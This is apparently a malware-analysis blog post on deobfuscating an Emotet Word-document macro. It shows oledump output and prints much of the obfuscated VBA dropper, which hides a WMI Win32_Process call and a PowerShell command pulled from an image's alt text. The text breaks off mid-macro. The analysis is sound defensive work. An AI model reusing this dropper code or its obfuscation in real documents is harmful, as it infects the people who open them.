Summary
=========
In this post I am going to cover how I managed to to deobfuscate the macro for this Emotet (Epoch 2) sample.
The maldoc can be found here.
Analysis
==========
With this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalscanner and got nothing back as well. Looking at the Word doc via “file” I could see that there was a macro in the file and it wasn’t something a rich-text file or something like that.
herbie$ file LRE-090120\ JYW-092120.doc LRE-090120 JYW-092120.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestias., Author: Clara Leroux, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 21 16:38:00 2020, Last Saved Time/Date: Mon Sep 21 16:38:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 32, Security: 0
Since OleTools and OfficeMalScanner didn’t work, I then used the other failsafe which is Didier Stevens’ Oledump script. Using this I was able to see what appeared to be 2 macros in the Word doc as seen below (denoted by the ‘M’).
herbie$ ./oledump.py LRE-090120\ JYW-092120.doc 1: 114 '\x01CompObj' 2: 352 '\x05DocumentSummaryInformation' 3: 424 '\x05SummaryInformation' 4: 7035 '1Table' 5: 125813 'Data' 6: 514 'Macros/PROJECT' 7: 92 'Macros/PROJECTwm' 8: 97 'Macros/Uoepmfd2vqk2/\x01CompObj' 9: 296 'Macros/Uoepmfd2vqk2/\x03VBFrame' 10: 438 'Macros/Uoepmfd2vqk2/f' 11: 504 'Macros/Uoepmfd2vqk2/o' 12: M 27502 'Macros/VBA/Uoepmfd2vqk2' 13: M 1679 'Macros/VBA/V216c23yqw7e5o2v' 14: 15352 'Macros/VBA/_VBA_PROJECT' 15: 1540 'Macros/VBA/__SRP_0' 16: 106 'Macros/VBA/__SRP_1' 17: 304 'Macros/VBA/__SRP_2' 18: 103 'Macros/VBA/__SRP_3' 19: 860 'Macros/VBA/dir' 20: 4096 'WordDocument'
I started with the first stream that was found (-s 12) to see what was there. Bingo. We have obfuscated code.
herbie$ ./oledump.py -v -s 12 LRE-090120\ JYW-092120.doc
Attribute VB_Name = "Uoepmfd2vqk2"
Attribute VB_Base = "0{5BB1BF4C-1019-4625-9105-80272C0DD792}{28F2CF55-40FF-4E43-8677-C56C8C692899}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Cbzdhgt82a6foxc53q()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(S_k9lapvm1p, 196, 1)
dYvJsnjw = Mid _
(Z__ibn17mkfjsiol5, 212, 1)
BiHOVG = Mid _
(Qsj_pi2ufi2852dgfe, 35, 1)
GQJzwq = Mid _
(Dru0bzo5apcxe2pc9, 34, 1)
WKcaSvfi = Mid _
(Zv3rshseproglck, 9, 1)
lsFUF = Mid _
(Srdtikao2ecvxgp, 240, 1)
VAwYHAcv = Mid _
(Eyfuay0mr8k9q6da, 20, 1)
hNfbEKURZVE = Mid _
(Pb0_ok1un1of8, 179, 1)
wYVOV = Mid _
(Gb1_y82tas2cma, 190, 1)
mLdZb = Mid _
(Z8abjber13o, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Zx0vguob716qdw, 33, 1)
zmlHaKIVkFA = Mid _
(Aqil91rp5ne, 168, 1)
UCPVYn = Mid _
(Levahjr27c9ut9_h, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Bu9x_darrq2t, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Quuseim6entz = 90
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Lakcnp87s71f7n9y, 196, 1)
dYvJsnjw = Mid _
(A5ggaxmwnp7jz7c, 212, 1)
BiHOVG = Mid _
(Co19uulv2shhotan, 35, 1)
GQJzwq = Mid _
(Fezxrpn9ra_, 34, 1)
WKcaSvfi = Mid _
(Q4_yp40i1ar, 9, 1)
lsFUF = Mid _
(Ppsqfi6oser3odx, 240, 1)
VAwYHAcv = Mid _
(Iadulufzhu01cfphyg, 20, 1)
hNfbEKURZVE = Mid _
(B893ifwurmi, 179, 1)
wYVOV = Mid _
(Ig_7z98hck4iw, 190, 1)
mLdZb = Mid _
(Dlm1jdicvcpi6, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Sayn_kxudj1k20, 33, 1)
zmlHaKIVkFA = Mid _
(Tezg_bkh3cebjv9rrc, 168, 1)
UCPVYn = Mid _
(Nbxqjlxuida0njd, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Y1b7np47k6in_f4ji, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Abmzntc3d7_5amw0a, 196, 1)
dYvJsnjw = Mid _
(Ssiyk2ux0lw, 212, 1)
BiHOVG = Mid _
(J8k82drrm2h, 35, 1)
GQJzwq = Mid _
(L_n7e5rsggqtwn, 34, 1)
WKcaSvfi = Mid _
(Pe2u3fatdtdwtsuz0, 9, 1)
lsFUF = Mid _
(Uhknysf5e7gq2, 240, 1)
VAwYHAcv = Mid _
(Jm6mwhqjprkma, 20, 1)
hNfbEKURZVE = Mid _
(Y_xrrj5friri, 179, 1)
wYVOV = Mid _
(Ybfmy44jhyhd35, 190, 1)
mLdZb = Mid _
(U5cls96fiz0rri6, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Wn3tikexth03mqo, 33, 1)
zmlHaKIVkFA = Mid _
(Llmyff2sc78x1mma, 168, 1)
UCPVYn = Mid _
(Al2_kktzq3k0d, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Uliag7hq1xkqnnr9h, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Uoepmfd2vqk2.Wjhx20hqda94eekj + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(R4j1tt_lcy2h4atkuq, 196, 1)
dYvJsnjw = Mid _
(Ypad86i99ny8cbz2, 212, 1)
BiHOVG = Mid _
(K4eftvdnstug, 35, 1)
GQJzwq = Mid _
(E15ttry1n7lw, 34, 1)
WKcaSvfi = Mid _
(Yp3yfejl73l, 9, 1)
lsFUF = Mid _
(K691ply3zg9cush, 240, 1)
VAwYHAcv = Mid _
(Nc85trxzv5o, 20, 1)
hNfbEKURZVE = Mid _
(X9l9safw2_9vx6, 179, 1)
wYVOV = Mid _
(Tr1ex8g457s_8, 190, 1)
mLdZb = Mid _
(Gev8i726avun, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Jselgze7h712u1f, 33, 1)
zmlHaKIVkFA = Mid _
(Baaior7nzp_w8r, 168, 1)
UCPVYn = Mid _
(Pkl5kzull4mb, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Wfzfwn9uteh7, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Lakeb7tqigcm, 196, 1)
dYvJsnjw = Mid _
(Xh7xheg1ff26, 212, 1)
BiHOVG = Mid _
(Oi_e2jr0uxx3s, 35, 1)
GQJzwq = Mid _
(T8clzmkouz4xzsqk, 34, 1)
WKcaSvfi = Mid _
(Ok2mkreq47hnui6zo, 9, 1)
lsFUF = Mid _
(Uc6ctagykldv0s, 240, 1)
VAwYHAcv = Mid _
(Ucs3orq067qda, 20, 1)
hNfbEKURZVE = Mid _
(L90ldxhas21, 179, 1)
wYVOV = Mid _
(Qg4mi8zd4fn9, 190, 1)
mLdZb = Mid _
(Yne_gc9fy6ofj77b3v, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Bi6jftxuo9ikvamek, 33, 1)
zmlHaKIVkFA = Mid _
(Alz3a0loh0b, 168, 1)
UCPVYn = Mid _
(Bbvw72ed0rutuiqu5, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Y2v01jcji792, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Qim37oqtd3b8p, 196, 1)
dYvJsnjw = Mid _
(Ejqk82c1t5jf5wvd8, 212, 1)
BiHOVG = Mid _
(B7k3xvnrori_n92x23, 35, 1)
GQJzwq = Mid _
(Bkpg8zss2u59_7c6uv, 34, 1)
WKcaSvfi = Mid _
(Q79pmwruqmog64, 9, 1)
lsFUF = Mid _
(Vzx1ncecw8ut, 240, 1)
VAwYHAcv = Mid _
(Clcgbnfce7cvq, 20, 1)
hNfbEKURZVE = Mid _
(Bfmn0e6ani6i, 179, 1)
wYVOV = Mid _
(M5ls4ciqfkifs, 190, 1)
mLdZb = Mid _
(B15ue89c8jtwood9, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(J4byj4nktiz87eirs, 33, 1)
zmlHaKIVkFA = Mid _
(Iuz1lop8c0gy5nhr7, 168, 1)
UCPVYn = Mid _
(L_48rjwzjfbel, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Xw3oexsyjn2o, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Beh18bbci4uibjmm, 196, 1)
dYvJsnjw = Mid _
(Vidj9mvisxz0, 212, 1)
BiHOVG = Mid _
(T0nlexcitv5n7, 35, 1)
GQJzwq = Mid _
(Bekqhtlgj1sd3xr, 34, 1)
WKcaSvfi = Mid _
(Kmd0bw61e1k_ky, 9, 1)
lsFUF = Mid _
(Xc1teihsq0u1y, 240, 1)
VAwYHAcv = Mid _
(A6q3egsj8uqjulsim, 20, 1)
hNfbEKURZVE = Mid _
(Pqwbcdmgh6xas8g7d6, 179, 1)
wYVOV = Mid _
(Fgr3xgfd6y7aiwzdi, 190, 1)
mLdZb = Mid _
(Z4mp0_yx7ctc, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Fxoezfz_78assl5p, 33, 1)
zmlHaKIVkFA = Mid _
(V40yebt4ire_kd, 168, 1)
UCPVYn = Mid _
(U_yn5r_0uie8l9q, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Virj2eadw7mryvav, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(T_zbtc1w4mtq, 196, 1)
dYvJsnjw = Mid _
(Mcnx530dlo80, 212, 1)
BiHOVG = Mid _
(Mlly4qz_3dfgo0, 35, 1)
GQJzwq = Mid _
(A1eojnxok57cmfrw, 34, 1)
WKcaSvfi = Mid _
(Bfvplftc2i10iqp5l, 9, 1)
lsFUF = Mid _
(Pksza68a59o, 240, 1)
VAwYHAcv = Mid _
(Wksnejoi1vvmt, 20, 1)
hNfbEKURZVE = Mid _
(Xqcnqjac7mko, 179, 1)
wYVOV = Mid _
(Stllwynnpr6, 190, 1)
mLdZb = Mid _
(Epdnazgg79q9q, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Dn3pgd2fy1pk_y, 33, 1)
zmlHaKIVkFA = Mid _
(Us0ibk5817xd, 168, 1)
UCPVYn = Mid _
(G3cn6et_v_l2, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(A3o021tadpr1phl, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Yj0lpxol1uc, 196, 1)
dYvJsnjw = Mid _
(A97xzc8zmeh36, 212, 1)
BiHOVG = Mid _
(Agnkq3qp0_vhben3o, 35, 1)
GQJzwq = Mid _
(Rul9thh69tz5b, 34, 1)
WKcaSvfi = Mid _
(Mvwh9qdl9v_8, 9, 1)
lsFUF = Mid _
(Ma3lu27dltd, 240, 1)
VAwYHAcv = Mid _
(Ecv682f9o1qtg59i, 20, 1)
hNfbEKURZVE = Mid _
(P10wf16fhedgd, 179, 1)
wYVOV = Mid _
(Btu3otra66_y, 190, 1)
mLdZb = Mid _
(Ojf14y1z5ebbn1zzw, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Tluo_wcuz7v, 33, 1)
zmlHaKIVkFA = Mid _
(Dxr9k7bpltnrjos1b, 168, 1)
UCPVYn = Mid _
(Ulj4imigjtxi05d0a, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Opp4yh2i0cfwem, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(E8sewtjp2ud, 196, 1)
dYvJsnjw = Mid _
(Croq4u8zd29c4txpk_, 212, 1)
BiHOVG = Mid _
(Eooe3vwi6pvzeh, 35, 1)
GQJzwq = Mid _
(B0jjxd0u0p_p, 34, 1)
WKcaSvfi = Mid _
(B76f3c0wzmx6h, 9, 1)
lsFUF = Mid _
(Bjsc47xrzgbno, 240, 1)
VAwYHAcv = Mid _
(Vqz3gkf0vp8c, 20, 1)
hNfbEKURZVE = Mid _
(Pnwwop38lqngu, 179, 1)
wYVOV = Mid _
(Phydpz23jx6z9hdz, 190, 1)
mLdZb = Mid _
(E2xbdduy9xk, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Amwwvt38msns5d0, 33, 1)
zmlHaKIVkFA = Mid _
(Ssu5wmhp9ysedqrcr, 168, 1)
UCPVYn = Mid _
(Gkjdmyl32xoe, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ze40pcq8yfgz, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ntysp0l_ijtph1k77, 196, 1)
dYvJsnjw = Mid _
(Y_z2nu_f36djtt0t, 212, 1)
BiHOVG = Mid _
(C_rqx3dp787eu7bhly, 35, 1)
GQJzwq = Mid _
(E2fesjhq8_1_, 34, 1)
WKcaSvfi = Mid _
(R4g8okkhwmsxea, 9, 1)
lsFUF = Mid _
(Zbci74ng960h, 240, 1)
VAwYHAcv = Mid _
(Ihqf9oq3zf4bn9, 20, 1)
hNfbEKURZVE = Mid _
(Kyroi0q69seylwj, 179, 1)
wYVOV = Mid _
(Ld57o7m11vq, 190, 1)
mLdZb = Mid _
(Xjgs643kov0r7, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Ny42efqen0ucg, 33, 1)
zmlHaKIVkFA = Mid _
(I3yysf0ylx4t60x, 168, 1)
UCPVYn = Mid _
(Dnabnz8_ql637i04w, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Yx9k01n6mg9w, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ngdcwyg32b4skvo5c1. _
showwindow = wdKeyEquals - wdKeyEquals
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(N8z1qrw043qy, 196, 1)
dYvJsnjw = Mid _
(Cwoi88pz8kpt1, 212, 1)
BiHOVG = Mid _
(Q5x7sqeifek9, 35, 1)
GQJzwq = Mid _
(Tq00bpbyyxtsjyuwx, 34, 1)
WKcaSvfi = Mid _
(E1i0fg80if8rk, 9, 1)
lsFUF = Mid _
(Zcyi9moezv_gdoi3vw, 240, 1)
VAwYHAcv = Mid _
(Wdhw4l4cdh73hnw, 20, 1)
hNfbEKURZVE = Mid _
(E_mzk8cby0_ds1q, 179, 1)
wYVOV = Mid _
(H0p53r79fkk9444, 190, 1)
mLdZb = Mid _
(M7b4i9i0bg06l1un2, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Mi9321douawfj, 33, 1)
zmlHaKIVkFA = Mid _
(Dgvxyxmn2r4wtbwp1, 168, 1)
UCPVYn = Mid _
(Eslv62elz6ohn88dzf, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Yze0fsr0ehc, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Zk46e7c8d40(G7b_e54iwh7id_)
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(L31m5rr9jos, 196, 1)
dYvJsnjw = Mid _
(Csilqzwq_u8iwbn76b, 212, 1)
BiHOVG = Mid _
(Ca1um8zqqh_8ew8g9e, 35, 1)
GQJzwq = Mid _
(Arn9d87r24ewchpo8o, 34, 1)
WKcaSvfi = Mid _
(Xo3jfi_x3xz6q2_as2, 9, 1)
lsFUF = Mid _
(Qyqp9ymw8z1, 240, 1)
VAwYHAcv = Mid _
(Z4aisjih1dje, 20, 1)
hNfbEKURZVE = Mid _
(B9y6dg9x63jq05v5x, 179, 1)
wYVOV = Mid _
(Ycozcptr3ju, 190, 1)
mLdZb = Mid _
(Npmu82y25t3vf, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(T4tpyodalbr, 33, 1)
zmlHaKIVkFA = Mid _
(Wimxpydsi6do9, 168, 1)
UCPVYn = Mid _
(E7jpk5ucz19mwgktd, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ct7pphedsy371, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(C6r3ywvl9t2w7hk_g, 196, 1)
dYvJsnjw = Mid _
(Pj5z77yujf3qizd038, 212, 1)
BiHOVG = Mid _
(Hdv0f3uegx62vk, 35, 1)
GQJzwq = Mid _
(Nxap_wddnpu, 34, 1)
WKcaSvfi = Mid _
(Hbt8qos76_ly8l, 9, 1)
lsFUF = Mid _
(M9opggegr0m96g_i, 240, 1)
VAwYHAcv = Mid _
(Pkjdy2pncojtlms, 20, 1)
hNfbEKURZVE = Mid _
(Wwg0anlg7c9dqxz6, 179, 1)
wYVOV = Mid _
(Ucwbx6g0bd37xfw6i, 190, 1)
mLdZb = Mid _
(P5jsj0civ4m8qzo3tk, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Qi3_a0juli8miixebs, 33, 1)
zmlHaKIVkFA = Mid _
(Uy0pjowfydr7x, 168, 1)
UCPVYn = Mid _
(Yv355jtap3_zr, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(R4vmjirjz4s, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Wm10z37ev280anbn, 196, 1)
dYvJsnjw = Mid _
(H6gq1q0gau0gz, 212, 1)
BiHOVG = Mid _
(Qot_o1_i5snhka, 35, 1)
GQJzwq = Mid _
(Cypl2hs2jg723, 34, 1)
WKcaSvfi = Mid _
(F908lkvsoyykbazc, 9, 1)
lsFUF = Mid _
(E0688t69iexj5s, 240, 1)
VAwYHAcv = Mid _
(Fuwuol013wj3xrgrcg, 20, 1)
hNfbEKURZVE = Mid _
(S493lpd0df9ivf1c, 179, 1)
wYVOV = Mid _
(Kfzghicky3ircy, 190, 1)
mLdZb = Mid _
(Cf4fk4lfkn6v5oz, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Xozc8rstu7ryx7r, 33, 1)
zmlHaKIVkFA = Mid _
(Mnepnu4zd_o, 168, 1)
UCPVYn = Mid _
(Ixj70flcnwywxjwol, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Np75dqjjjnw_08dy, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Rn60_vw9ki0a5akw, 196, 1)
dYvJsnjw = Mid _
(Mqesnmb7i1uj3elp, 212, 1)
BiHOVG = Mid _
(Kl93_qjt6042y, 35, 1)
GQJzwq = Mid _
(Cv_b0_hlb4d3, 34, 1)
WKcaSvfi = Mid _
(Aztexwux_z7ra7_tn, 9, 1)
lsFUF = Mid _
(Dvvry4cnpbdj, 240, 1)
VAwYHAcv = Mid _
(Rivi6l6gfdte, 20, 1)
hNfbEKURZVE = Mid _
(Cv0ei3yv9gkva2bkgs, 179, 1)
wYVOV = Mid _
(Suhjpxfhscarcm3, 190, 1)
mLdZb = Mid _
(Nol5lvu2bly6v580, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Zon7lurdvgt9zhi, 33, 1)
zmlHaKIVkFA = Mid _
(Bt76zhearid_, 168, 1)
UCPVYn = Mid _
(Qygb8c9p4h652, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ka4mdpvtlae73kmp, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Zk46e7c8d40 = B4ru9eb_hhowd
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(J2hq9d7fh_35w37, 196, 1)
dYvJsnjw = Mid _
(Qzaz3l4map05, 212, 1)
BiHOVG = Mid _
(E6d_d1y90o683, 35, 1)
GQJzwq = Mid _
(X2ft_p4no8w4b9, 34, 1)
WKcaSvfi = Mid _
(Lteb3aez6tchkykg3, 9, 1)
lsFUF = Mid _
(V8v770pv4qg, 240, 1)
VAwYHAcv = Mid _
(Hz1ct716aq3cl, 20, 1)
hNfbEKURZVE = Mid _
(Yhszd264hbjuxgxgiz, 179, 1)
wYVOV = Mid _
(Minshfpq8_oetv8, 190, 1)
mLdZb = Mid _
(Fcdnqtsrz50, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Oi5idu52uzlu, 33, 1)
zmlHaKIVkFA = Mid _
(H94481_2epeelc92, 168, 1)
UCPVYn = Mid _
(Uogg7zgfb_2frt3uyf, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Sz4d_sp41e3r7ay, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Qfyk87zgdp86ufle()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(M7xg60mfwvhnr6jtot, 196, 1)
dYvJsnjw = Mid _
(Y0gc8q4z0esg, 212, 1)
BiHOVG = Mid _
(Hfm2hak4b9qmfoo9y5, 35, 1)
GQJzwq = Mid _
(Onxbk521bjnb, 34, 1)
WKcaSvfi = Mid _
(Kjcmstmoio7, 9, 1)
lsFUF = Mid _
(T12bp3lknww, 240, 1)
VAwYHAcv = Mid _
(Cc9qkjty8m98mcpf, 20, 1)
hNfbEKURZVE = Mid _
(Um02aud_yxsc22, 179, 1)
wYVOV = Mid _
(Qoiqw7d07ieo451mm, 190, 1)
mLdZb = Mid _
(Uvjx9ds5rxxb, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Ewdk950uwzndt8g, 33, 1)
zmlHaKIVkFA = Mid _
(D9kf89fu_qe03, 168, 1)
UCPVYn = Mid _
(Lm5w04zu4tnwh8, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ophmulzn8ziqtkrza4, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Oeqcm_gbql69pr, 196, 1)
dYvJsnjw = Mid _
(P4gtyykmim4tkfkr6, 212, 1)
BiHOVG = Mid _
(Yj6i49td8tp, 35, 1)
GQJzwq = Mid _
(R181wcx8d2k3h2uq, 34, 1)
WKcaSvfi = Mid _
(Xf6_7qi8najau238uy, 9, 1)
lsFUF = Mid _
(Quui500h0da, 240, 1)
VAwYHAcv = Mid _
(Jchbnv14jz4, 20, 1)
hNfbEKURZVE = Mid _
(Bn8u_t6ycr5m, 179, 1)
wYVOV = Mid _
(Yab9jj5m079n1, 190, 1)
mLdZb = Mid _
(I66492lgrboiqi, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Z8i7zqvz7ap_8, 33, 1)
zmlHaKIVkFA = Mid _
(M_hkft4hz7v, 168, 1)
UCPVYn = Mid _
(Tu_ta5w00_z, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(A02g_3t3od0ch0, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(C79um_qaar3a8crt, 196, 1)
